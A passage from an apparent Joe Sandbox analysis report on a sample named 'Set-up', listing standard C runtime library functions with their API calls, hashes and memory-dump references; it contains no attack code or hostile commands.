API String ID: 2935806426-0
Opcode ID: 903f581ec0b8b6877970e5a377ce5b029af72863da8d9ae3bb9d1216424a1d12
Instruction ID: 2b87d7f520b00111deeb77b60d17dcb154085b3d07542c47ae58812a4cba57e0
Opcode Fuzzy Hash: 903f581ec0b8b6877970e5a377ce5b029af72863da8d9ae3bb9d1216424a1d12
Instruction Fuzzy Hash: 8431917160068EAFEF008FA5DC80EAF7BA9FB09384F100466FA1497251E739DD608B64

Function 6BB6087F Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87946
_invalid_parameter_noinfo.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87950
_errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB8795C
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87966
_errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87972
_errno.MSVCR100(?,?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87991

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
Instruction ID: 5ed7de126eaf4707bde32a059efb1d8e716325cca860fbf5e24f9204b4955c87
Opcode Fuzzy Hash: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
Instruction Fuzzy Hash: AE213631250392EBD7285F3AC8C125E7361EF46798B60413EE5168B290F7B88C81C7D5

Function 6BB6921F Relevance: 9.1, APIs: 6, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB69260

Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D

_towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6BB69273
_errno.MSVCR100(?), ref: 6BB8C4F8
_invalid_parameter_noinfo.MSVCR100(?), ref: 6BB8C503
_errno.MSVCR100(?,?), ref: 6BB8C51E
_invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB8C529

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
String ID:
API String ID: 3991495309-0
Opcode ID: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
Instruction ID: e8c3d28e42d5eb1185b406535510ba832676227362d41f6b63550515e7dfeef0
Opcode Fuzzy Hash: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
Instruction Fuzzy Hash: 6A3109B29001E59BDF208FA9C8827BD77A4EF42665F640389E4B09B1D5EB3CCD40D761

Function 6BB720BE Relevance: 9.1, APIs: 6, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

_strnicoll_l.MSVCR100(?,?,?,?,74DE8406,?,?,?,?,?,?), ref: 6BB72115

Part of subcall function 6BB7204F: _strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9

_errno.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAE4
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAEF
_errno.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB0A
_invalid_parameter_noinfo.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB15
__crtCompareStringA.MSVCR100(?,?,00001001,?,?,?,?,00000000,74DE8406,?,?,?,?,?,?), ref: 6BB8AB33

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
String ID:
API String ID: 1477060370-0
Opcode ID: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
Instruction ID: 6768a26d0d7baebc9e13fc4fb00b9ae1e5ebfba4dcb57efe4e7504ee577cd0b9
Opcode Fuzzy Hash: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
Instruction Fuzzy Hash: 332153719102C9EFDF11AFB8C8819AD7BA5EF02324B1442A9F1305B1E5E7398A51DF51

Function 6BBA1D1A Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
_memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75

Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC

??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: HeadInitializeList$??2@_memsetmalloc
String ID:
API String ID: 2874038712-0
Opcode ID: f952c2a348714ea27be9b936adea6a5a3d1f6039950b5c3d4193f82f3d055d34
Instruction ID: a49b186410866dd0a1e1a82ab16172a0adc3af7f36b3888a597eadf602378aa5
Opcode Fuzzy Hash: f952c2a348714ea27be9b936adea6a5a3d1f6039950b5c3d4193f82f3d055d34
Instruction Fuzzy Hash: F0211AB1605B409FD364CF3EC981A16FBE8FF89310B545A1EE59AC7AA0D774E8418B14

Function 6BB780BC Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF
_calloc_crt.MSVCR100(00000001,00000002), ref: 6BB879E6
_errno.MSVCR100 ref: 6BB879F3

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CurrentDirectory_calloc_crt_errno
String ID:
API String ID: 1856998256-0
Opcode ID: b9c38d3ad0c48bb102e9b62e3cd7dd9f32bbf071df3c059cfa86820d3c6571fe
Instruction ID: 549da52de039442450ebe8858cba6f7cfc1b10516c0c76563850ff7d8513e340
Opcode Fuzzy Hash: b9c38d3ad0c48bb102e9b62e3cd7dd9f32bbf071df3c059cfa86820d3c6571fe
Instruction Fuzzy Hash: 5C213D72E403998FD730AF6ACC85B9D73B5DB45758F0141B9D51497280EBBC8E84CBA1

Function 6BBA53E4 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BBA53EB
??_V@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5440
??3@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5447
Concurrency::unsupported_os::unsupported_os.LIBCMT(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA5454
_CxxThrowException.MSVCR100(?,6BBFFE24,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000), ref: 6BBA5462
??1event@Concurrency@@QAE@XZ.MSVCR100(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA546E

Part of subcall function 6BBA538C: __uncaught_exception.MSVCR100(?,?,?,?,6BB95C86,00000001), ref: 6BBA53A1

Part of subcall function 6BBA5538: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR100(?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?), ref: 6BBA5568
Part of subcall function 6BBA5538: ??3@YAXPAX@Z.MSVCR100(?,?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000), ref: 6BBA556E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ??3@Concurrency@@$??1_??1event@Collection@details@Concurrency::unsupported_os::unsupported_osExceptionH_prolog3TaskThrow__uncaught_exception
String ID:
API String ID: 3788188742-0
Opcode ID: 394fadeec9b22a49828a800c6f4313588a9245fa076b6af2ccbef48df25071dd
Instruction ID: b51b66e1eace8c2783f66be79eec1251fa35da017ef87cd8f6c0eb50b5162183
Opcode Fuzzy Hash: 394fadeec9b22a49828a800c6f4313588a9245fa076b6af2ccbef48df25071dd
Instruction Fuzzy Hash: 95012231E453C08BDB18DA71C453B6E7379EF01768B84019CE2615B5A0EF7CEA0AC744

Function 6BB6A7FB Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB6A8A4
__doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4DE
_errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4E6
_errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4FC
_invalid_parameter_noinfo.MSVCR100(6BB6A880,00000010), ref: 6BB8F507
_errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F50E

Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA

Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
String ID:
API String ID: 1720121285-0
Opcode ID: f29e53e27b85d71b6621403d7dab6be1cec94d4aefe262760a21bcd952bba868
Instruction ID: 3cfe8be139f21cb03e06ffa4700953a5f3a9fd3598caea8dbe626053f288e0b4
Opcode Fuzzy Hash: f29e53e27b85d71b6621403d7dab6be1cec94d4aefe262760a21bcd952bba868
Instruction Fuzzy Hash: 7D1188318003A48FDB119F78C9C275C77A0AF423A9F650686D1349B2D1EBBC9E418EA1

Function 6BB6AC84 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
_lock.MSVCR100(0000000D), ref: 6BB6ACA7

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

InterlockedDecrement.KERNEL32(?), ref: 6BB6D0B7
InterlockedIncrement.KERNEL32(018216E8), ref: 6BB6D0DF

Part of subcall function 6BB6ACFC: _unlock.MSVCR100(0000000D,6BB6ACCF), ref: 6BB6ACFE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Interlocked$CriticalDecrementEnterIncrementSection_getptd_lock_unlock
String ID:
API String ID: 1606532611-0
Opcode ID: 227090ef658c3bba5ffc8e3aa8e0284ffc1dd41fb1f0048325fbd9302b136c02
Instruction ID: f6a70cf73add1ce96c8e5e1b89ffe3c9cc772344b7b5471786b399a4f9ee79cf
Opcode Fuzzy Hash: 227090ef658c3bba5ffc8e3aa8e0284ffc1dd41fb1f0048325fbd9302b136c02
Instruction Fuzzy Hash: B511CE32D55AA0DFCB109B359801B0D7370FB45B94F500146D4106B280FBBCAE828FE1

Function 6BB6A8DF Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__freebuf.LIBCMT ref: 6BB6A903

Part of subcall function 6BB6A8AE: free.MSVCR100(?,?,?,6BB6A908,?,?), ref: 6BB6A8C5

_fileno.MSVCR100(?,?,?), ref: 6BB6A909
_close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F
_errno.MSVCR100 ref: 6BB88B94
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88B9F

Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B

free.MSVCR100(?), ref: 6BB88BB4

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
String ID:
API String ID: 1941134952-0
Opcode ID: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
Instruction ID: 7b50764f5274c3b55492a181edb8a81cd352eb6db6cbbb524cce6fb7aadecdf7
Opcode Fuzzy Hash: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
Instruction Fuzzy Hash: 57F0F422911BA01BCA10163A8C01B5E32989FC67F9F110614D928831D0F73CDD014FA0

Function 6BB78163 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB7816A
_errno.MSVCR100 ref: 6BB78171
_wfullpath.MSVCR100(?,?,?), ref: 6BB78182

Part of subcall function 6BB61E61: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6

_errno.MSVCR100 ref: 6BB7818C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePath_wfullpath
String ID:
API String ID: 3755888649-0
Opcode ID: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
Instruction ID: 4f1a6577e243684d885f90684561f9c8b1365e9e44119067542714a0cc2c0147
Opcode Fuzzy Hash: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
Instruction Fuzzy Hash: 90F06D35210284AFCB121F76DC46B5D3B61EF867A5F4500B0E9185B220FB798C108FA1

Function 6BB6FB0D Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB75BD5
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB8A1A9

Strings

$, xrefs: 6BB6FB47

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: $
API String ID: 2959964966-3993045852
Opcode ID: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
Instruction ID: f0354f43988bee3a5af42de485a5caadbddcaff166710f7e0c3785309d4a9390
Opcode Fuzzy Hash: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
Instruction Fuzzy Hash: 38710130D496CACBDB25CF68C5903AE3BB1EF02794F2401AAD8605B1D0E37D9E91CB95

Function 6BB61AB5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6BB61BF0,?,?,?,00000000), ref: 6BB61AFE

Strings

$, xrefs: 6BB61AE3

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: iswctype
String ID: $
API String ID: 304682654-3993045852
Opcode ID: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
Instruction ID: 30b0b9c1bccba935ffe1f9eb843c8b1bca282c53bf8133faf1a0a61c80b66038
Opcode Fuzzy Hash: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
Instruction Fuzzy Hash: 7D51D3319042EADADF208F19C94539E37B4EF02B98F6C5296E824961D0F37C8E50CF51

Function 6BB68ED9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB68F59
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8A694

Strings

P, xrefs: 6BB8A6B7

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: P
API String ID: 2959964966-3110715001
Opcode ID: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
Instruction ID: e0b88861c7023f1c9b72da3e010388c56540816f1f3559d5eda770f319a18457
Opcode Fuzzy Hash: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
Instruction Fuzzy Hash: B32104322442C5DBDB215E6C8CC059DB7A6EB53794B200DABE664872C4F77CCC858F92

Function 6BB6498E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000,00000005), ref: 6BB90ACD
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB90AD8
_strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6BB90AE6

Strings

_.,, xrefs: 6BB90ADD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __invoke_watson$_strcspnstrcat_s
String ID: _.,
API String ID: 4004410220-2709443920
Opcode ID: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
Instruction ID: 11958980a2f67e2f4c17823721a7e67135204e7986401bdeb8f8ebe47fe96618
Opcode Fuzzy Hash: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
Instruction Fuzzy Hash: FFF0B433505289BB9B002E79AC8188F3B1AFE813BC721453AFE2851052E73DD9619B90

Function 6BB97406 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51timeCOMMON

Download Yara Rule

APIs

CreateTimerQueue.KERNEL32(880653CF,?,00000000,880653CF,?,00000000,880653CF,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
std::exception::exception.LIBCMT(6BB95C86,00000001,880653CF,?,00000000,880653CF), ref: 6BB97487
_CxxThrowException.MSVCR100(880653CF,6BB6BDD8,6BB95C86,00000001,880653CF,?,00000000,880653CF), ref: 6BB9749C

Strings

bad allocation, xrefs: 6BB97480

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CreateExceptionQueueThrowTimerstd::exception::exception
String ID: bad allocation
API String ID: 3396838967-2104205924
Opcode ID: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
Instruction ID: 9856fd73ad2eba0b7d8d3fbe053c848feb991b46c1b3f445fd8416ac756544ff
Opcode Fuzzy Hash: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
Instruction Fuzzy Hash: D511A070A042958BCB05EF6AD485A9E7BF4FB06744B111479E400D3300EB79DB40EBD1

Function 6BB6BAF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BB6BB00
_malloc_crt.MSVCR100(00000018,00000014,6BB6BB81,00000000,00000000), ref: 6BB6BB0D

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

std::exception::exception.LIBCMT(?,00000001,00000014,6BB6BB81,00000000,00000000), ref: 6BB872C0
_CxxThrowException.MSVCR100(6BB6BB81,6BB6BDD8,?,00000001,00000014), ref: 6BB872D5

Strings

bad allocation, xrefs: 6BB872B9

Memory Dump Source

